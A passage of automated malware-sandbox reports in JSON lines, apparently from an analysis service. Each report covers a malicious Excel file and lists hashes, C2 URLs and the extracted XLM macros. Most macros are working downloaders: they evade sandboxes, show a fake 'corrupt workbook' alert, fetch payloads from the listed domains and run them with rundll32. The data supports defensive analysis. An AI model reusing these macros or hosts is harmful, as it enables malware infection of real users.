corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"EVG2iCKsb9\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8f48ec63cb7cd13e1fb41adfeb8794615fbf48af128050b981c1f3ef057c4325"},"analysis":{"reported":"2020-04-09T16:17:39Z","score":10},"files":[{"filename":"8f48ec63cb7cd13e1fb41adfeb8794615fbf48af128050b981c1f3ef057c4325","filesize":141824,"md5":"4e5c9402050bbc994b7f69fd163f45bc","sha1":"6d559342dd25417e84d7c347471af7bfadfdbcab","sha256":"8f48ec63cb7cd13e1fb41adfeb8794615fbf48af128050b981c1f3ef057c4325","sha512":"0ae628b2e809e0220e3c6f1ef6d27082886538c0510c3ef4f20c732217e4f15aace864bf735013d42405ea4ef622f4084ac927ca6e942350a11f23243fef8efd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8f48ec63cb7cd13e1fb41adfeb8794615fbf48af128050b981c1f3ef057c4325.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"l3q7oFnnfz\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8f57c9c0c9529333638fa66bdb898d99179505c949c581b701c0e6c95804cc2b"},"analysis":{"reported":"2020-04-09T16:17:40Z","score":10},"files":[{"filename":"8f57c9c0c9529333638fa66bdb898d99179505c949c581b701c0e6c95804cc2b","filesize":225280,"md5":"5bb561fae7b96302d15b3e1381862b77","sha1":"21136c04ac28e8b37760afbe58c26b02dfe52baf","sha256":"8f57c9c0c9529333638fa66bdb898d99179505c949c581b701c0e6c95804cc2b","sha512":"ee43037298ca03d558b1f77aad6bffd6ea1dc2cb36d13831c6569cdb42a710b8a8b74c8c0828cbf1a0fd463f2187303b30a82a1530da022baa9d4865cf67de07","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8f57c9c0c9529333638fa66bdb898d99179505c949c581b701c0e6c95804cc2b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"vFHnrcaggh\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8f584458a1a554ccf24cbeb4a85f8dd5166ab27ccdea9d42d85f0d6d687ff3eb"},"analysis":{"reported":"2020-04-09T16:17:40Z","score":10},"files":[{"filename":"8f584458a1a554ccf24cbeb4a85f8dd5166ab27ccdea9d42d85f0d6d687ff3eb","filesize":141824,"md5":"36361b81bddf62630dc1fdb89b40993d","sha1":"54b6e016520c67a695a20a5e915ac6a5c7d3f3a3","sha256":"8f584458a1a554ccf24cbeb4a85f8dd5166ab27ccdea9d42d85f0d6d687ff3eb","sha512":"fb3b82c87f1001d5b716f3536906058657e6023751450b318be63f0c7682074dca344edebc744c7949cc913ed25cf0c590c853553192099cdb5c1d78c4f6faf1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8f584458a1a554ccf24cbeb4a85f8dd5166ab27ccdea9d42d85f0d6d687ff3eb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://orruucsl.xyz/fdgareg34g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"I7zlJmPphg\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8f5f16e9e5ad58eda6b17573ae8104c1cc5a111c444ba559ce2c8c4fc12e8625"},"analysis":{"reported":"2020-04-09T16:17:40Z","score":10},"files":[{"filename":"8f5f16e9e5ad58eda6b17573ae8104c1cc5a111c444ba559ce2c8c4fc12e8625","filesize":214528,"md5":"f21f47a6da626b6834783ce5188efc61","sha1":"0a3d1dfffb024c603e461335593473f25b59d7dc","sha256":"8f5f16e9e5ad58eda6b17573ae8104c1cc5a111c444ba559ce2c8c4fc12e8625","sha512":"05210aa1014a2056f786e8a680c966fc54e3bf1dded435c8ce277cb688721fb522aac8f32277352232cf4b881b7cbcc117424ae237f47e719bbd9a1dcb397de7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8f5f16e9e5ad58eda6b17573ae8104c1cc5a111c444ba559ce2c8c4fc12e8625.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"kg7zx5U5Bt\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8f6215cf095412ad57172a55907b1b7ebcf400fed2bf67a521b84cca30049178"},"analysis":{"reported":"2020-04-09T16:17:40Z","score":10},"files":[{"filename":"8f6215cf095412ad57172a55907b1b7ebcf400fed2bf67a521b84cca30049178","filesize":206336,"md5":"c4561c08972922bb07047650038657b9","sha1":"de57719665e0e32fd5709b9d4d25b8821284cecb","sha256":"8f6215cf095412ad57172a55907b1b7ebcf400fed2bf67a521b84cca30049178","sha512":"45e2d1bfe6fcdf07e233d221cece5c3c79aaec177f50f25661a13c0a2586107a41dfc3e14916e16e099a11b6482804fdd0f83d93eff8939a8c0fa56a0f578260","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8f6215cf095412ad57172a55907b1b7ebcf400fed2bf67a521b84cca30049178.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"zGAEB8O75z\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8f7559dd43615b53631288d7324e1420f750fa05ead81737d1318d735ba1d988"},"analysis":{"reported":"2020-04-09T16:17:40Z","score":10},"files":[{"filename":"8f7559dd43615b53631288d7324e1420f750fa05ead81737d1318d735ba1d988","filesize":112128,"md5":"e814118f009025c7e6110b211b348145","sha1":"946b4702a6c109e45647bf6a5d98c481ab13031e","sha256":"8f7559dd43615b53631288d7324e1420f750fa05ead81737d1318d735ba1d988","sha512":"29982acbe1c587b7ec6687b47b3a7fbd9f5a43ccc84fc4c1bfd99829b988c54632782d18c20b1290e282f66b5bbfd36449c0ea8e8ee66e6019fc866d4a3c2a9f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8f7559dd43615b53631288d7324e1420f750fa05ead81737d1318d735ba1d988.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8f785f6e6d03ee339cbdc27bfda53b69152c54644d69e24d9e7cdd9e476d23ec"},"analysis":{"reported":"2020-04-09T16:17:40Z","score":10},"files":[{"filename":"8f785f6e6d03ee339cbdc27bfda53b69152c54644d69e24d9e7cdd9e476d23ec","filesize":221184,"md5":"7e516873f20df62fcd34bdea705779aa","sha1":"e48a888121a85ad1f6a4bb01ed63e710a0b96f2b","sha256":"8f785f6e6d03ee339cbdc27bfda53b69152c54644d69e24d9e7cdd9e476d23ec","sha512":"1c9cb10a61c4e694629a2de210fcc915c918a69022abf92b8620692971450a6489b642bdeaaaf6ba05b126575bb5dd2e20a4a178f67d1e98a4bce7ac57ab6deb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8f785f6e6d03ee339cbdc27bfda53b69152c54644d69e24d9e7cdd9e476d23ec.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ZUZVkp9bhq\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8f8b60aa5ab7fdf18d6630db3492b9533b316c2a34a55b63a180ac235f684bf7"},"analysis":{"reported":"2020-04-09T16:17:40Z","score":10},"files":[{"filename":"8f8b60aa5ab7fdf18d6630db3492b9533b316c2a34a55b63a180ac235f684bf7","filesize":160768,"md5":"3f005470bc8239d34a326fd144969d71","sha1":"da58befd1f3a28c3b03c0661dee31351fa64e9c2","sha256":"8f8b60aa5ab7fdf18d6630db3492b9533b316c2a34a55b63a180ac235f684bf7","sha512":"793410057ae473588f225ad331f63cb0b904be9d1af8e58c80cc3af6ca179825796ebc40ca32423d5f37eae08f6ba827f34bf0ae6e48f42799ac128b1d96e861","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8f8b60aa5ab7fdf18d6630db3492b9533b316c2a34a55b63a180ac235f684bf7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"AdQwyvJai3\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8f92b116382fe2c95f5a7cf2cee71e6f50a6f8ba3e4a0265117477ccb15ca119"},"analysis":{"reported":"2020-04-09T16:17:40Z","score":10},"files":[{"filename":"8f92b116382fe2c95f5a7cf2cee71e6f50a6f8ba3e4a0265117477ccb15ca119","filesize":160768,"md5":"d766f8a2355705f240ef9445c11b5bee","sha1":"91543a61cfbb1e9086052411b382e96291150972","sha256":"8f92b116382fe2c95f5a7cf2cee71e6f50a6f8ba3e4a0265117477ccb15ca119","sha512":"3e7eb4fcef86210ba59180445b30809f50c5f3c2be69febc2b78b6c6d983fa0f8c469582aaa6fdff460b55d50f9f677b01786e7760c2b27ad0c2cd83acd88a22","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8f92b116382fe2c95f5a7cf2cee71e6f50a6f8ba3e4a0265117477ccb15ca119.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"fqtE3iQEDT\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8f960d7e6c51bdd0d0b0f453de48eee11f1cc65889387d4b7b450c6017548dd5"},"analysis":{"reported":"2020-04-09T16:17:40Z","score":10},"files":[{"filename":"8f960d7e6c51bdd0d0b0f453de48eee11f1cc65889387d4b7b450c6017548dd5","filesize":152576,"md5":"9c6a2084b9137a27490dcbf0cd61b3ac","sha1":"4be589ba9947159d92541fcb8e0fb66741329fde","sha256":"8f960d7e6c51bdd0d0b0f453de48eee11f1cc65889387d4b7b450c6017548dd5","sha512":"19d929561ef07ae4e13eb4a944f998bece1a2c114ff22d8c7e0a4ba1f2b82fb2e24e21273763b3394f3c7b81d934b3fc21e7ab91bf86dba52f71ac345ed5d152","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8f960d7e6c51bdd0d0b0f453de48eee11f1cc65889387d4b7b450c6017548dd5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Dsy95f1JHP\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8faaae3f8597f7bf2b1a7208410da52ca7e9183b00101b75a6d74949dfcb3417"},"analysis":{"reported":"2020-04-09T16:17:40Z","score":10},"files":[{"filename":"8faaae3f8597f7bf2b1a7208410da52ca7e9183b00101b75a6d74949dfcb3417","filesize":209408,"md5":"04e246e6fb6610f18d260c9d76f726ad","sha1":"89b08a9dab12f0a3b9e514123e80c6f1f8b44438","sha256":"8faaae3f8597f7bf2b1a7208410da52ca7e9183b00101b75a6d74949dfcb3417","sha512":"04809cc10128ac51c6470e8396da69bb2e24bfe64c0b84dea3d13f2e3d7d55dae7ff7d6205962f16c097769c4f7a8df332c70253ce27cd25acf492e3c318c0bd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8faaae3f8597f7bf2b1a7208410da52ca7e9183b00101b75a6d74949dfcb3417.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"yfmj9EbgtH\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8fb6e87ad4049454b3964d2db08560c65ac09a045d09549989cb3589aadd266a"},"analysis":{"reported":"2020-04-09T16:17:40Z","score":10},"files":[{"filename":"8fb6e87ad4049454b3964d2db08560c65ac09a045d09549989cb3589aadd266a","filesize":185344,"md5":"51508e2292ea0b3f983ea4e6e793fd7d","sha1":"ca97b7b49312ae73a42543661d340327bf8cb137","sha256":"8fb6e87ad4049454b3964d2db08560c65ac09a045d09549989cb3589aadd266a","sha512":"05a05f8951c3e5eee9bdc4ece2d0ade35f3ac569f4711348de851052b4f3f80a27fc52d55f41d4ca7bfd8e24c18c259590a283fd5f1c79d8c125d0ee7e06ddab","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8fb6e87ad4049454b3964d2db08560c65ac09a045d09549989cb3589aadd266a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8fcda283370a9a61a91aaa7e560fbaf7759ee04aeb486a93adeb571f66de9edc"},"analysis":{"reported":"2020-04-09T16:17:40Z","score":10},"files":[{"filename":"8fcda283370a9a61a91aaa7e560fbaf7759ee04aeb486a93adeb571f66de9edc","filesize":167936,"md5":"8e57da6799608bb53f74fabe97720173","sha1":"3d21bbb476a2b290360d5d86e21404c46057bf8b","sha256":"8fcda283370a9a61a91aaa7e560fbaf7759ee04aeb486a93adeb571f66de9edc","sha512":"26e3c3c1c4ff0c84e1b641cd070eaa214242d74aac8cf452e68ef180f0844761ad56cc9d3405cc5eba32e26c19dd693544976703dd381e5751a9d667c1e7eeed","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8fcda283370a9a61a91aaa7e560fbaf7759ee04aeb486a93adeb571f66de9edc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ODYIIB0Bvo\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8fd6ba7125e744c4247cc9edccb05735a2f567bdd66d62fd952fc149212b6692"},"analysis":{"reported":"2020-04-09T16:17:40Z","score":10},"files":[{"filename":"8fd6ba7125e744c4247cc9edccb05735a2f567bdd66d62fd952fc149212b6692","filesize":116224,"md5":"5f9dc22fdcdd0dccc2ca41c13c089fb0","sha1":"1dd1fd6a123dfc6ad4f80813b2138ac0307c8fab","sha256":"8fd6ba7125e744c4247cc9edccb05735a2f567bdd66d62fd952fc149212b6692","sha512":"34feabb27de1542240e3ca39696a5ea093ab53d6e2cff1c4b666ba7f22184683eb2b4015f29a1519573dab99137edfd5d8a918f4b068786455dde88fcd2ae230","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8fd6ba7125e744c4247cc9edccb05735a2f567bdd66d62fd952fc149212b6692.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"DBTjvhSkG3\",TRUE)\nGOTO(R$1C$10)"}}}]}
